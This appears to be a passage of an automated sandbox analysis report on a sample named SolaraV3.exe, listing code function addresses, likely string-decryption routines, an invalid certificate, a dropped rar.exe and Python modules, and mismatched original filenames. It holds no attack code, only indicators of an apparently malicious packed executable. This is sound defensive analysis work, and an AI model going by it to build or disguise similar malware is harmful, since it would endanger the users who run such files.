Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811D88	2_2_00007FFB0B811D88
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B941490	2_2_00007FFB0B941490
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8132EC	2_2_00007FFB0B8132EC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81228E	2_2_00007FFB0B81228E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815515	2_2_00007FFB0B815515
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81428C	2_2_00007FFB0B81428C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82D260	2_2_00007FFB0B82D260
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8130C6	2_2_00007FFB0B8130C6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815BF5	2_2_00007FFB0B815BF5
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B835200	2_2_00007FFB0B835200
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B949130	2_2_00007FFB0B949130
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B50B0	2_2_00007FFB0B9B50B0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C9100	2_2_00007FFB0B9C9100
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81710D	2_2_00007FFB0B81710D
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811424	2_2_00007FFB0B811424
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8154D4	2_2_00007FFB0B8154D4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B951760	2_2_00007FFB0B951760
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814C3C	2_2_00007FFB0B814C3C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812E91	2_2_00007FFB0B812E91
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814ACA	2_2_00007FFB0B814ACA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81504C	2_2_00007FFB0B81504C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81276B	2_2_00007FFB0B81276B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815614	2_2_00007FFB0B815614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811B27	2_2_00007FFB0B811B27
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8115C8	2_2_00007FFB0B8115C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8154CF	2_2_00007FFB0B8154CF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B952C00	2_2_00007FFB0B952C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813A94	2_2_00007FFB0B813A94
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814D09	2_2_00007FFB0B814D09
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815F10	2_2_00007FFB0B815F10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8123F6	2_2_00007FFB0B8123F6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815DA3	2_2_00007FFB0B815DA3
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9CA900	2_2_00007FFB0B9CA900
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8153AD	2_2_00007FFB0B8153AD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8144CB	2_2_00007FFB0B8144CB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82F060	2_2_00007FFB0B82F060
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81638E	2_2_00007FFB0B81638E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B3010	2_2_00007FFB0B9B3010
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814F43	2_2_00007FFB0B814F43
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812171	2_2_00007FFB0B812171
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8153C6	2_2_00007FFB0B8153C6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82EF00	2_2_00007FFB0B82EF00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81213A	2_2_00007FFB0B81213A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8F2CD0	2_2_00007FFB0B8F2CD0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816564	2_2_00007FFB0B816564
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811299	2_2_00007FFB0B811299
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815434	2_2_00007FFB0B815434
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813634	2_2_00007FFB0B813634
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816EBF	2_2_00007FFB0B816EBF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811A50	2_2_00007FFB0B811A50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811217	2_2_00007FFB0B811217
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812301	2_2_00007FFB0B812301
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816D5C	2_2_00007FFB0B816D5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8126EE	2_2_00007FFB0B8126EE
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C6100	2_2_00007FFB0B9C6100
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814E53	2_2_00007FFB0B814E53
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8168CA	2_2_00007FFB0B8168CA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9525D0	2_2_00007FFB0B9525D0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81144C	2_2_00007FFB0B81144C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B93E5F0	2_2_00007FFB0B93E5F0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8165A0	2_2_00007FFB0B8165A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814408	2_2_00007FFB0B814408
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81318E	2_2_00007FFB0B81318E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816FFF	2_2_00007FFB0B816FFF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8110AA	2_2_00007FFB0B8110AA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81707C	2_2_00007FFB0B81707C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81416A	2_2_00007FFB0B81416A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813698	2_2_00007FFB0B813698
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81348B	2_2_00007FFB0B81348B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82BF20	2_2_00007FFB0B82BF20
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8160DC	2_2_00007FFB0B8160DC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815E25	2_2_00007FFB0B815E25
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82BD60	2_2_00007FFB0B82BD60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B943CC0	2_2_00007FFB0B943CC0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815A65	2_2_00007FFB0B815A65
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811CC6	2_2_00007FFB0B811CC6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B947480	2_2_00007FFB0B947480
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812D10	2_2_00007FFB0B812D10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813BA7	2_2_00007FFB0B813BA7
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812671	2_2_00007FFB0B812671
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812987	2_2_00007FFB0B812987
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B817257	2_2_00007FFB0B817257
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813837	2_2_00007FFB0B813837
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816EF1	2_2_00007FFB0B816EF1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B83B1C0	2_2_00007FFB0B83B1C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82F200	2_2_00007FFB0B82F200
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8150B0	2_2_00007FFB0B8150B0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81114F	2_2_00007FFB0B81114F
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9CB0E0	2_2_00007FFB0B9CB0E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8157D6	2_2_00007FFB0B8157D6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B947780	2_2_00007FFB0B947780
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81435E	2_2_00007FFB0B81435E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B87F700	2_2_00007FFB0B87F700
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813792	2_2_00007FFB0B813792
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81474B	2_2_00007FFB0B81474B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811B36	2_2_00007FFB0B811B36
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B83B550	2_2_00007FFB0B83B550
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35B360	2_2_00007FFB0C35B360
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35168B	2_2_00007FFB0C35168B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3520B3	2_2_00007FFB0C3520B3
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3B0B50	2_2_00007FFB0C3B0B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C356BA0	2_2_00007FFB0C356BA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C351537	2_2_00007FFB0C351537
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C351DD4	2_2_00007FFB0C351DD4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35195B	2_2_00007FFB0C35195B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3A0240	2_2_00007FFB0C3A0240
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3B8460	2_2_00007FFB0C3B8460
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C352572	2_2_00007FFB0C352572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAA9470FDD	14_2_00007FFAA9470FDD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9AE10	110_2_00007FF74EE9AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7ABA0	110_2_00007FF74EE7ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA7B24	110_2_00007FF74EEA7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE80A2C	110_2_00007FF74EE80A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE71884	110_2_00007FF74EE71884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7B540	110_2_00007FF74EE7B540
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE854C0	110_2_00007FF74EE854C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE81180	110_2_00007FF74EE81180
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE782F0	110_2_00007FF74EE782F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAC00C	110_2_00007FF74EEAC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB4FE8	110_2_00007FF74EEB4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDDFD8	110_2_00007FF74EEDDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDAF90	110_2_00007FF74EEDAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA5F4C	110_2_00007FF74EEA5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE90104	110_2_00007FF74EE90104
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED00F0	110_2_00007FF74EED00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0074	110_2_00007FF74EEA0074
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9C05C	110_2_00007FF74EE9C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA8040	110_2_00007FF74EEA8040
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE83030	110_2_00007FF74EE83030
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7EE08	110_2_00007FF74EE7EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE81E04	110_2_00007FF74EE81E04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC1DCC	110_2_00007FF74EEC1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB9D74	110_2_00007FF74EEB9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0D20	110_2_00007FF74EEA0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAAF0C	110_2_00007FF74EEAAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE79EFC	110_2_00007FF74EE79EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBEEA4	110_2_00007FF74EEBEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7CE84	110_2_00007FF74EE7CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECFE74	110_2_00007FF74EECFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88E68	110_2_00007FF74EE88E68
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBAE50	110_2_00007FF74EEBAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC9B98	110_2_00007FF74EEC9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB4B38	110_2_00007FF74EEB4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE99D0C	110_2_00007FF74EE99D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC6D0C	110_2_00007FF74EEC6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7DD04	110_2_00007FF74EE7DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5C8C	110_2_00007FF74EEB5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88C30	110_2_00007FF74EE88C30
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB69FD	110_2_00007FF74EEB69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE749B8	110_2_00007FF74EE749B8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9D97C	110_2_00007FF74EE9D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAD91C	110_2_00007FF74EEAD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7CB14	110_2_00007FF74EE7CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDAAC0	110_2_00007FF74EEDAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5A70	110_2_00007FF74EEB5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAFA6C	110_2_00007FF74EEAFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE967E0	110_2_00007FF74EE967E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE817C8	110_2_00007FF74EE817C8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB190C	110_2_00007FF74EEB190C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0904	110_2_00007FF74EEA0904
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA38E8	110_2_00007FF74EEA38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC18A8	110_2_00007FF74EEC18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE82890	110_2_00007FF74EE82890
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE78884	110_2_00007FF74EE78884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC260C	110_2_00007FF74EEC260C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA65FC	110_2_00007FF74EEA65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9F5B0	110_2_00007FF74EE9F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88598	110_2_00007FF74EE88598
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAF59C	110_2_00007FF74EEAF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAA710	110_2_00007FF74EEAA710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB0710	110_2_00007FF74EEB0710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB2700	110_2_00007FF74EEB2700
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED86D4	110_2_00007FF74EED86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE886C4	110_2_00007FF74EE886C4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC7660	110_2_00007FF74EEC7660
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9C3E0	110_2_00007FF74EE9C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0374	110_2_00007FF74EEA0374
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE82360	110_2_00007FF74EE82360
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC832C	110_2_00007FF74EEC832C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7A504	110_2_00007FF74EE7A504
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5468	110_2_00007FF74EEB5468
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9D458	110_2_00007FF74EE9D458
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED41CC	110_2_00007FF74EED41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB81CC	110_2_00007FF74EEB81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB2164	110_2_00007FF74EEB2164
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC1314	110_2_00007FF74EEC1314
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE742E0	110_2_00007FF74EE742E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8D2C0	110_2_00007FF74EE8D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB02A4	110_2_00007FF74EEB02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC2268	110_2_00007FF74EEC2268
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7F24C	110_2_00007FF74EE7F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE97244	110_2_00007FF74EE97244
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C	110_2_00007FF74EE8E21C

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B8124BE appears 84 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B814840 appears 129 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FF6DC702710 appears 104 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B811EF6 appears 1581 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3512EE appears 293 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FF6DC702910 appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B812739 appears 516 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3BDFBF appears 88 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B814D6D appears 34 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B813012 appears 55 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81698D appears 49 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81688E appears 31 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0C3BE055 appears 63 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B812A09 appears 172 times
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: String function: 00007FFB0B81405C appears 780 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: String function: 00007FF74EE88444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: String function: 00007FF74EEB49F4 appears 53 times

PE / OLE file has an invalid certificate

Source: SolaraV3.exe

Static PE information: invalid certificate

PE file contains executable resources (Code or Archives)

Source: rar.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Sample file is different than original file name gathered from version info

Source: SolaraV3.exe	Binary or memory string: OriginalFilename vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000000.1559321077.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
Source: SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs SolaraV3.exe
